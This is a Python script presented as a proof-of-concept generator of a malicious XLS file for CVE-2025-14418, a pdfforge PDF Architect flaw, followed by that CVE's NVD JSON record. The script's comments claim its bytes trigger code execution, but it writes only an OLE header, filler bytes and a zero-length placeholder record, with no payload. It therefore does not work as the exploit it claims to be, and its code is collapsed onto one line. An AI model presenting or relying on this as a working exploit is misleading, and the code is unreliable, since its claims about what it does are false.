CVE-2025-14418

# CVE-2025-14418 PoC - Malicious XLS File Generator # Note: This is for educational and security research purposes only # Author: Security Research # Reference: ZDI-CAN-27502 import struct from io import BytesIO def create_malicious_xls(): """ Generate a malicious XLS file that exploits CVE-2025-14418 The vulnerability allows execution of dangerous scripts without user warning """ # OLE2 compound document header ole_header = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' # XLS file structure with embedded OLE object # This PoC demonstrates the file structure that triggers the vulnerability xls_content = BytesIO() # BIFF8 worksheet stream (Excel 97-2003 format) biff8_header = bytes([ 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ]) # BOF record (Beginning of File) bof_record = struct.pack('<HHHIH', 0x0809, # Record type 0x0010, # Record length 0x0006, # Version 0x0000, # Type 0x0000 # Build identifier ) # Embedded OLE object record (triggers code execution) ole_object_record = struct.pack('<HH', 0x0200, # Record type for embedded object 0x0000 # Placeholder ) # EOF record eof_record = struct.pack('<HH', 0x000A, 0x0000) # Assemble the malicious XLS file xls_content.write(ole_header) xls_content.write(biff8_header) xls_content.write(bof_record) xls_content.write(ole_object_record) xls_content.write(eof_record) return xls_content.getvalue() def save_poc(): """ Save the PoC file for testing in a controlled environment """ malicious_content = create_malicious_xls() with open('CVE-2025-14418_poc.xls', 'wb') as f: f.write(malicious_content) print('[+] PoC file generated: CVE-2025-14418_poc.xls') print('[+] Note: This file should only be used in authorized security testing') if __name__ == '__main__': save_poc()

{"cve": {"id": "CVE-2025-14418", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.777", "lastModified": "2026-01-02T21:48:38.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27502."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1075/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}